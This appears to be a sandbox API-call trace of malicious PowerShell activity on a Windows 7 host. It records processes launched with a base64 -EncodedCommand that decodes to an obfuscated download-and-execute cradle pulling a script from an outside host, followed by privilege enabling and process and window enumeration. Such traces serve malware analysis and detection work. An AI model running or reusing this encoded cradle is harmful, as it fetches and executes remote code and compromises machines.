	[0648.225] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0648.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0648.225] CoTaskMemFree (pv=0x40a560) 
	[0648.227] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0648.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0648.227] CoTaskMemFree (pv=0x40a560) 
	[0649.722] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0649.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.722] CoTaskMemFree (pv=0x40a560) 
	[0649.732] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0649.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.732] CoTaskMemFree (pv=0x40a560) 
	[0649.754] CoTaskMemAlloc (cb=0x3b) returned 0x4185e0
	[0649.755] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84de58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84de58) returned 0x4550
	[0649.756] CoTaskMemFree (pv=0x4185e0) 
	[0649.759] GetConsoleWindow () returned 0x1044c
	[0649.767] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0649.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0649.767] CoTaskMemFree (pv=0x40a560) 
	[0649.768] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0649.768] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0649.768] CoTaskMemFree (pv=0x40a560) 
	[0651.386] CoTaskMemAlloc (cb=0x104) returned 0x40a560
	[0651.386] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x40a560, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0651.386] CoTaskMemFree (pv=0x40a560) 
	[0651.389] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c84dea0 | out: pNumArgs=0x1c84dea0) returned 0x3bdca0*=""
	[0651.390] lstrlenW (lpString="-EncodedCommand") returned 15
	[0651.391] CoTaskMemAlloc (cb=0x22) returned 0x1b9d7850
	[0651.391] RtlMoveMemory (in: Destination=0x1b9d7850, Source=0x3bdcc2, Length=0x20 | out: Destination=0x1b9d7850) 
	[0651.391] CoTaskMemFree (pv=0x1b9d7850) 
	[0651.392] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0651.392] CoTaskMemAlloc (cb=0x2f4) returned 0x407c90
	[0651.392] RtlMoveMemory (in: Destination=0x407c90, Source=0x3bdce2, Length=0x2f2 | out: Destination=0x407c90) 
	[0651.392] CoTaskMemFree (pv=0x407c90) 
	[0651.396] LocalFree (hMem=0x3bdca0) returned 0x0
	[0651.396] CoTaskMemAlloc (cb=0x804) returned 0x1b9e9550
	[0651.396] GetConsoleTitleW (in: lpConsoleTitle=0x1b9e9550, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0651.397] CoTaskMemFree (pv=0x1b9e9550) 
	[0651.407] CoTaskMemAlloc (cb=0x38e) returned 0x3bdca0
	[0651.407] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c84de00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eb3448 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2eb3448*(hProcess=0x398, hThread=0x34c, dwProcessId=0x1d08, dwThreadId=0x1d0c)) returned 1
	[0651.413] CoTaskMemFree (pv=0x3bdca0) 
	[0651.416] CloseHandle (hObject=0x34c) returned 1
	[0651.417] CoTaskMemAlloc (cb=0x3b) returned 0x4185e0
	[0651.417] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84dea8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84dea8) returned 0x4550
	[0651.418] CoTaskMemFree (pv=0x4185e0) 
	[0651.421] GetCurrentProcess () returned 0xffffffffffffffff
	[0651.421] GetCurrentProcess () returned 0xffffffffffffffff
	[0651.422] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c84df88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c84df88*=0x34c) returned 1

Process:
	id = "75"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x23906000"
	os_pid = "0xd88"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "14"
	os_parent_pid = "0x9fc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 350
	os_tid = 0xdb8


Thread:
	id = 443
	os_tid = 0x10d8


Thread:
	id = 450
	os_tid = 0x10f4


Process:
	id = "76"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x23990000"
	os_pid = "0xdd4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 351
	os_tid = 0xdf8

	[0646.992] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0652.177] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0652.177] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0652.177] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0652.177] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0686.179] GetVersionExW (in: lpVersionInformation=0x22df00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22df00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0686.181] GetVersionExW (in: lpVersionInformation=0x22df00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22df00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0687.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0688.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0688.131] GetVersionExW (in: lpVersionInformation=0x22dc70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22dc70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0688.132] SetErrorMode (uMode=0x1) returned 0x1
	[0688.133] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22ddd0 | out: lpFileInformation=0x22ddd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0688.134] SetErrorMode (uMode=0x1) returned 0x1
	[0688.138] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e040 | out: lpdwHandle=0x22e040) returned 0x94c
	[0688.143] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d972d8 | out: lpData=0x2d972d8) returned 1
	[0688.146] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dfb8, puLen=0x22dfb0 | out: lplpBuffer=0x22dfb8*=0x2d97374, puLen=0x22dfb0) returned 1
	[0688.149] lstrlenW (lpString="䅁") returned 1
	[0689.594] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d97450, puLen=0x22df20) returned 1
	[0689.595] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0689.597] CoTaskMemAlloc (cb=0x2e) returned 0x472820
	[0689.597] lstrcpyW (in: lpString1=0x472820, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0689.598] CoTaskMemFree (pv=0x472820) 
	[0689.598] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d974a4, puLen=0x22df20) returned 1
	[0689.598] lstrlenW (lpString="System.Management.Automation") returned 28
	[0689.598] CoTaskMemAlloc (cb=0x3c) returned 0x3a9860
	[0689.598] lstrcpyW (in: lpString1=0x3a9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0689.598] CoTaskMemFree (pv=0x3a9860) 
	[0689.599] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d97500, puLen=0x22df20) returned 1
	[0689.599] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.599] CoTaskMemAlloc (cb=0x20) returned 0x470a60
	[0689.599] lstrcpyW (in: lpString1=0x470a60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.599] CoTaskMemFree (pv=0x470a60) 
	[0689.599] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d97540, puLen=0x22df20) returned 1
	[0689.599] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.599] CoTaskMemAlloc (cb=0x44) returned 0x3a9860
	[0689.599] lstrcpyW (in: lpString1=0x3a9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.599] CoTaskMemFree (pv=0x3a9860) 
	[0689.599] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d975a8, puLen=0x22df20) returned 1
	[0689.599] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0689.599] CoTaskMemAlloc (cb=0x76) returned 0x412220
	[0689.599] lstrcpyW (in: lpString1=0x412220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0689.599] CoTaskMemFree (pv=0x412220) 
	[0689.599] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d97644, puLen=0x22df20) returned 1
	[0689.599] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.599] CoTaskMemAlloc (cb=0x44) returned 0x3a9860
	[0689.599] lstrcpyW (in: lpString1=0x3a9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.599] CoTaskMemFree (pv=0x3a9860) 
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d976a8, puLen=0x22df20) returned 1
	[0689.600] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0689.600] CoTaskMemAlloc (cb=0x58) returned 0x3cc810
	[0689.600] lstrcpyW (in: lpString1=0x3cc810, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0689.600] CoTaskMemFree (pv=0x3cc810) 
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d97724, puLen=0x22df20) returned 1
	[0689.600] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.600] CoTaskMemAlloc (cb=0x20) returned 0x470a60
	[0689.600] lstrcpyW (in: lpString1=0x470a60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.600] CoTaskMemFree (pv=0x470a60) 
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x2d973cc, puLen=0x22df20) returned 1
	[0689.600] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0689.600] CoTaskMemAlloc (cb=0x66) returned 0x3ec1a0
	[0689.600] lstrcpyW (in: lpString1=0x3ec1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0689.600] CoTaskMemFree (pv=0x3ec1a0) 
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x0, puLen=0x22df20) returned 0
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x0, puLen=0x22df20) returned 0
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22df28, puLen=0x22df20 | out: lplpBuffer=0x22df28*=0x0, puLen=0x22df20) returned 0
	[0689.600] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22def8, puLen=0x22def0 | out: lplpBuffer=0x22def8*=0x2d97374, puLen=0x22def0) returned 1
	[0689.602] CoTaskMemAlloc (cb=0x204) returned 0x414970
	[0689.602] VerLanguageNameW (in: wLang=0x0, szLang=0x414970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0689.603] CoTaskMemFree (pv=0x414970) 
	[0689.604] VerQueryValueW (in: pBlock=0x2d972d8, lpSubBlock="\\", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2d97300, puLen=0x22df40) returned 1
	[0689.609] GetCurrentProcessId () returned 0xdd4
	[0689.625] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22ce70 | out: lpLuid=0x22ce70*(LowPart=0x14, HighPart=0)) returned 1
	[0691.572] GetCurrentProcess () returned 0xffffffffffffffff
	[0691.573] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x22ce90 | out: TokenHandle=0x22ce90*=0x2e0) returned 1
	[0691.574] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2d9ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0691.576] CloseHandle (hObject=0x2e0) returned 1
	[0691.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2e0
	[0691.589] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2d9abb8, cb=0x200, lpcbNeeded=0x22dea8 | out: lphModule=0x2d9abb8, lpcbNeeded=0x22dea8) returned 1
	[0691.592] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2d9ae28, cb=0x18 | out: lpmodinfo=0x2d9ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0691.593] CoTaskMemAlloc (cb=0x804) returned 0x47b490
	[0691.593] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x47b490, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0691.593] CoTaskMemFree (pv=0x47b490) 
	[0691.594] CoTaskMemAlloc (cb=0x804) returned 0x47b490
	[0691.594] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x47b490, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0691.594] CoTaskMemFree (pv=0x47b490) 
	[0691.595] CloseHandle (hObject=0x2e0) returned 1
	[0691.604] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2e0
	[0691.605] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x22dfd8 | out: lpExitCode=0x22dfd8*=0x103) returned 1
	[0693.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d9b088, Length=0x20000, ResultLength=0x22dfa0 | out: SystemInformation=0x12d9b088, ResultLength=0x22dfa0*=0x3aa40) returned 0xc0000004
	[0693.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dbb0b8, Length=0x3d240, ResultLength=0x22dfa0 | out: SystemInformation=0x12dbb0b8, ResultLength=0x22dfa0*=0x3aa40) returned 0x0
	[0702.769] EnumWindows (lpEnumFunc=0x21366ac, lParam=0x0) 
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x558
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x538
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x778
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x778
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.574] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
